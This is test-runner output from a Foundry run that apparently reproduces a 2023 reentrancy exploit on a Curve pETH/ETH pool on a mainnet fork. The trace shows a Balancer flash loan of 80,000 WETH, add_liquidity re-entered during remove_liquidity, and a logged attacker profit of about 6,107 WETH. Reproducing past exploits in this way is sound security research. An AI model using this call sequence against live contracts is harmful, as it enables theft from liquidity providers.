Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.90s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-07/Curve_exp01.sol:29:5:
   |
29 |     IWFTM WETH = IWFTM(payable(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/Curve_exp01.sol:59:9:
   |
59 |         address[] memory tokens,
   |         ^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/Curve_exp01.sol:60:9:
   |
60 |         uint256[] memory amounts,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/Curve_exp01.sol:61:9:
   |
61 |         uint256[] memory feeAmounts,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/Curve_exp01.sol:62:9:
   |
62 |         bytes memory userData
   |         ^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.98s (340.58ms CPU time)

Ran 1 test for src/test/2023-07/Curve_exp01.sol:ContractTest
[PASS] testExploit() (gas: 436808)
Logs:
  Attacker WETH balance after exploit: 6107.408695702176366805

Traces:
  [15135] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 17806055 [1.78e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(pETH: [0x836A808d4828586A69364065A1e064609F5078c7], "pETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(CurvePool: [0x9848482da3Ee3076165ce6497eDA906E66bB85C5], "CurvePool")
    │   └─ ← [Return]
    ├─ [0] VM::label(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], "Balancer")
    │   └─ ← [Return]
    └─ ← [Stop]

  [551276] ContractTest::testExploit()
    ├─ [0] VM::deal(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ [531082] Balancer::flashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [80000000000000000000000 [8e22]], 0x)
    │   ├─ [2534] WETH::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 86795127034225377702217 [8.679e22]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [27962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 80000000000000000000000 [8e22])
    │   │   ├─ emit Transfer(from: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 80000000000000000000000 [8e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000010f0cf064dd592000000
    │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x0000000000000000000000000000000000000000000012612c5b115613407149 → 0x0000000000000000000000000000000000000000000001705d54c38081407149
    │   │   └─ ← [Return] true
    │   ├─ [477273] ContractTest::receiveFlashLoan([0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [80000000000000000000000 [8e22]], [0], 0x)
    │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 80000000000000000000000 [8e22]
    │   │   ├─ [11387] WETH::withdraw(80000000000000000000000 [8e22])
    │   │   │   ├─ [2247] ContractTest::receive{value: 80000000000000000000000}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 80000000000000000000000 [8e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000010f0cf064dd592000000 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [105940] CurvePool::add_liquidity{value: 40000000000000000000000}([40000000000000000000000 [4e22], 0], 0)
    │   │   │   ├─ [103256] 0x6326DEbBAa15bCFE603d831e7D75f4fc10d9B43E::add_liquidity{value: 40000000000000000000000}([40000000000000000000000 [4e22], 0], 0) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 32431418915862116695669 [3.243e22])
    │   │   │   │   ├─ emit AddLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: [40000000000000000000000 [4e22], 0], param2: [4421749730658949548 [4.421e18], 2913376661805340593 [2.913e18]], param3: 43621854439637124701736 [4.362e22], param4: 43646820214778998853971 [4.364e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x537f10c2742c858bba952932ef83574ab67f45f24751727b51b34501a246c7dd: 0 → 0x0000000000000000000000000000000000000000000006de1c599af47599fe75
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000001110140b946b51a4d05 → 0x000000000000000000000000000000000000000000000110ed0986f50531412d
    │   │   │   │   │   @ 26: 0x00000000000000000000000000000000000000000000025ffcf59b9f435e92de → 0x00000000000000000000000000000000000000000000093e194f3693b8f89153
    │   │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000014f4ef71451a6d37997 → 0x0000000000000000000000000000000000000000000009c797cba0428105ecc1
    │   │   │   │   └─ ← [Return] 32431418915862116695669 [3.243e22]
    │   │   │   └─ ← [Return] 32431418915862116695669 [3.243e22]
    │   │   ├─ [1481] CurvePool::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [1309] 0x6326DEbBAa15bCFE603d831e7D75f4fc10d9B43E::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 32431418915862116695669 [3.243e22]
    │   │   │   └─ ← [Return] 32431418915862116695669 [3.243e22]
    │   │   ├─ [141286] CurvePool::remove_liquidity(32431418915862116695669 [3.243e22], [0, 0])
    │   │   │   ├─ [141099] 0x6326DEbBAa15bCFE603d831e7D75f4fc10d9B43E::remove_liquidity(32431418915862116695669 [3.243e22], [0, 0]) [delegatecall]
    │   │   │   │   ├─ [18] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [67182] ContractTest::receive{value: 34316009777207925757865}()
    │   │   │   │   │   ├─ [56220] CurvePool::add_liquidity{value: 40000000000000000000000}([40000000000000000000000 [4e22], 0], 0)
    │   │   │   │   │   │   ├─ [56036] 0x6326DEbBAa15bCFE603d831e7D75f4fc10d9B43E::add_liquidity{value: 40000000000000000000000}([40000000000000000000000 [4e22], 0], 0) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 82182763636158886167824 [8.218e22])
    │   │   │   │   │   │   │   ├─ emit AddLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: [40000000000000000000000 [4e22], 0], param2: [3530087276181103200 [3.53e18], 1896347436403022274 [1.896e18]], param3: 47613640272454222360269 [4.761e22], param4: 125829583850937885021795 [1.258e23])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x537f10c2742c858bba952932ef83574ab67f45f24751727b51b34501a246c7dd: 0x0000000000000000000000000000000000000000000006de1c599af47599fe75 → 0x0000000000000000000000000000000000000000000018453f4e231929ffc385
    │   │   │   │   │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000283517e49e6b3069518 → 0x000000000000000000000000000000000000000000000afba082befb269343e8
    │   │   │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000000000000000000110ed0986f50531412d → 0x000000000000000000000000000000000000000000000110dfe0effbea6e144c
    │   │   │   │   │   │   │   │   @ 26: 0x00000000000000000000000000000000000000000000093e194f3693b8f89153 → 0x000000000000000000000000000000000000000000001aa53c43beb86d5e5663
    │   │   │   │   │   │   │   └─ ← [Return] 82182763636158886167824 [8.218e22]
    │   │   │   │   │   │   └─ ← [Return] 82182763636158886167824 [8.218e22]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [18] PRECOMPILES::identity(0xa9059cbb)
    │   │   │   │   │   └─ ← [Return] 0xa9059cbb
    │   │   │   │   ├─ [27] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000044a9059cbb0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000cac1d95fe6ee973742)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000044a9059cbb0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000cac1d95fe6ee973742
    │   │   │   │   ├─ [32136] pETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3740210604054045734722 [3.74e21])
    │   │   │   │   │   ├─ emit Transfer(from: CurvePool: [0x9848482da3Ee3076165ce6497eDA906E66bB85C5], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3740210604054045734722 [3.74e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x15996258d5245f9616497b19526277d4715462de50d7d012d424447f85071656: 0x00000000000000000000000000000000000000000000011103c1dc1d0ca21f92 → 0x00000000000000000000000000000000000000000000004641e87c361e0ae850
    │   │   │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x0000000000000000000000000000000000000000000000cac1d95fe6ee973742
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [21] PRECOMPILES::identity(0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001)
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 32431418915862116695669 [3.243e22])
    │   │   │   │   ├─ emit RemoveLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: [34316009777207925757865 [3.431e22], 3740210604054045734722 [3.74e21]], param2: [0, 0], param3: 11215401298916882158302 [1.121e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0: 1 → 0
    │   │   │   │   │   @ 26: 0x000000000000000000000000000000000000000000001aa53c43beb86d5e5663 → 0x00000000000000000000000000000000000000000000025ffcf59b9f435e92de
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000000000000000000110dfe0effbea6e144c → 0x0000000000000000000000000000000000000000000000461e079014fbd6dd0a
    │   │   │   │   │   @ 0x537f10c2742c858bba952932ef83574ab67f45f24751727b51b34501a246c7dd: 0x0000000000000000000000000000000000000000000018453f4e231929ffc385 → 0x00000000000000000000000000000000000000000000116722f48824b465c510
    │   │   │   │   │   @ 8: 0x0000000000000000000000000000000000000000000009c797cba0428105ecc1 → 0x000000000000000000000000000000000000000000000283517e49e6b3069518
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000744464d565bcdff57a90000000000000000000000000000000000000000000000cac1d95fe6ee973742
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000744464d565bcdff57a90000000000000000000000000000000000000000000000cac1d95fe6ee973742
    │   │   ├─ [42061] CurvePool::remove_liquidity(10272000000000000000000 [1.027e22], [0, 0])
    │   │   │   ├─ [41874] 0x6326DEbBAa15bCFE603d831e7D75f4fc10d9B43E::remove_liquidity(10272000000000000000000 [1.027e22], [0, 0]) [delegatecall]
    │   │   │   │   ├─ [18] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [357] ContractTest::receive{value: 47502626146117962135746}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [18] PRECOMPILES::identity(0xa9059cbb)
    │   │   │   │   │   └─ ← [Return] 0xa9059cbb
    │   │   │   │   ├─ [27] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000044a9059cbb0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000040382260c1f9d2f27c)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000044a9059cbb0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000040382260c1f9d2f27c
    │   │   │   │   ├─ [3436] pETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1184636522518979736188 [1.184e21])
    │   │   │   │   │   ├─ emit Transfer(from: CurvePool: [0x9848482da3Ee3076165ce6497eDA906E66bB85C5], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1184636522518979736188 [1.184e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x15996258d5245f9616497b19526277d4715462de50d7d012d424447f85071656: 0x00000000000000000000000000000000000000000000004641e87c361e0ae850 → 0x00000000000000000000000000000000000000000000000609c61b742437f5d4
    │   │   │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x0000000000000000000000000000000000000000000000cac1d95fe6ee973742 → 0x00000000000000000000000000000000000000000000010af9fbc0a8e86a29be
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [21] PRECOMPILES::identity(0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001)
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 10272000000000000000000 [1.027e22])
    │   │   │   │   ├─ emit RemoveLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: [47502626146117962135746 [4.75e22], 1184636522518979736188 [1.184e21]], param2: [0, 0], param3: 943401298916882158302 [9.434e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000afba082befb269343e8 → 0x0000000000000000000000000000000000000000000000ec81250ec95e7bcb26
    │   │   │   │   │   @ 0x537f10c2742c858bba952932ef83574ab67f45f24751727b51b34501a246c7dd: 0x00000000000000000000000000000000000000000000116722f48824b465c510 → 0x000000000000000000000000000000000000000000000f3a4a519f8827e5c510
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000461e079014fbd6dd0a → 0x000000000000000000000000000000000000000000000005e5e52f530203ea8e
    │   │   │   │   │   @ 26: 0x00000000000000000000000000000000000000000000025ffcf59b9f435e92de → 0x0000000000000000000000000000000000000000000000332452b302b6de92de
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000a0f1f5db031c81778c2000000000000000000000000000000000000000000000040382260c1f9d2f27c
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000a0f1f5db031c81778c2000000000000000000000000000000000000000000000040382260c1f9d2f27c
    │   │   ├─ [21974] WETH::deposit{value: 81818635923325887893611}()
    │   │   │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 81818635923325887893611 [8.181e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000115365ab068d9616d06b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [583] pETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 4924847126573025470910 [4.924e21]
    │   │   ├─ [24681] pETH::approve(CurvePool: [0x9848482da3Ee3076165ce6497eDA906E66bB85C5], 4924847126573025470910 [4.924e21])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: CurvePool: [0x9848482da3Ee3076165ce6497eDA906E66bB85C5], value: 4924847126573025470910 [4.924e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0e2f301361b7a8c45cea22a170a011ed6dd3e10628142510402baecac6aeacbb: 0 → 0x00000000000000000000000000000000000000000000010af9fbc0a8e86a29be
    │   │   │   └─ ← [Return] true
    │   │   ├─ [583] pETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 4924847126573025470910 [4.924e21]
    │   │   ├─ [57311] CurvePool::exchange(1, 0, 4924847126573025470910 [4.924e21], 0)
    │   │   │   ├─ [57121] 0x6326DEbBAa15bCFE603d831e7D75f4fc10d9B43E::exchange(1, 0, 4924847126573025470910 [4.924e21], 0) [delegatecall]
    │   │   │   │   ├─ [18] PRECOMPILES::identity(0x23b872dd)
    │   │   │   │   │   └─ ← [Return] 0x23b872dd
    │   │   │   │   ├─ [30] PRECOMPILES::identity(0x000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000009848482da3ee3076165ce6497eda906e66bb85c500000000000000000000000000000000000000000000010af9fbc0a8e86a29be)
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000009848482da3ee3076165ce6497eda906e66bb85c500000000000000000000000000000000000000000000010af9fbc0a8e86a29be
    │   │   │   │   ├─ [6099] pETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], CurvePool: [0x9848482da3Ee3076165ce6497eDA906E66bB85C5], 4924847126573025470910 [4.924e21])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: CurvePool: [0x9848482da3Ee3076165ce6497eDA906E66bB85C5], value: 0)
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CurvePool: [0x9848482da3Ee3076165ce6497eDA906E66bB85C5], value: 4924847126573025470910 [4.924e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x0e2f301361b7a8c45cea22a170a011ed6dd3e10628142510402baecac6aeacbb: 0x00000000000000000000000000000000000000000000010af9fbc0a8e86a29be → 0
    │   │   │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x00000000000000000000000000000000000000000000010af9fbc0a8e86a29be → 0
    │   │   │   │   │   │   @ 0x15996258d5245f9616497b19526277d4715462de50d7d012d424447f85071656: 0x00000000000000000000000000000000000000000000000609c61b742437f5d4 → 0x00000000000000000000000000000000000000000000011103c1dc1d0ca21f92
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [21] PRECOMPILES::identity(0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001)
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─ [18] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [357] ContractTest::receive{value: 4288772772376288473194}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit TokenExchange(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 1, param2: 4924847126573025470910 [4.924e21], param3: 0, param4: 4288772772376288473194 [4.288e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x0000000000000000000000000000000000000000000000ec81250ec95e7bcb26 → 0x000000000000000000000000000000000000000000000003f68ec9ce34ef82c8
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000000000000000000005e5e52f530203ea8e → 0x000000000000000000000000000000000000000000000110dfe0effbea6e144c
    │   │   │   │   └─ ← [Return] 4288772772376288473194 [4.288e21]
    │   │   │   └─ ← [Return] 4288772772376288473194 [4.288e21]
    │   │   ├─ [2074] WETH::deposit{value: 4288772772376288473194}()
    │   │   │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 4288772772376288473194 [4.288e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000115365ab068d9616d06b → 0x00000000000000000000000000000000000000000000123be458b82325ff80d5
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] WETH::transfer(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 80000000000000000000000 [8e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 80000000000000000000000 [8e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000123be458b82325ff80d5 → 0x00000000000000000000000000000000000000000000014b15526a4d93ff80d5
    │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x0000000000000000000000000000000000000000000001705d54c38081407149 → 0x0000000000000000000000000000000000000000000012612c5b115613407149
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x0e2f301361b7a8c45cea22a170a011ed6dd3e10628142510402baecac6aeacbb: 0 → 0x00000000000000000000000000000000000000000000010af9fbc0a8e86a29be
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000115365ab068d9616d06b → 0x00000000000000000000000000000000000000000000123be458b82325ff80d5
    │   │   │   @ 2: 1 → 0
    │   │   │   @ 1: 1 → 0
    │   │   │   @ 0: 1 → 0
    │   │   │   @ 36: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [534] WETH::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 86795127034225377702217 [8.679e22]
    │   ├─ emit FlashLoan(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], param2: 80000000000000000000000 [8e22], param3: 0)
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 6107408695702176366805 [6.107e21]
    ├─ [2444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WETH balance after exploit", val: 6107408695702176366805 [6.107e21], decimals: 18)
    ├─  storage changes:
    │   @ 0: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 20.17s (12.56s CPU time)

Ran 2 test suites in 21.05s (26.15s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
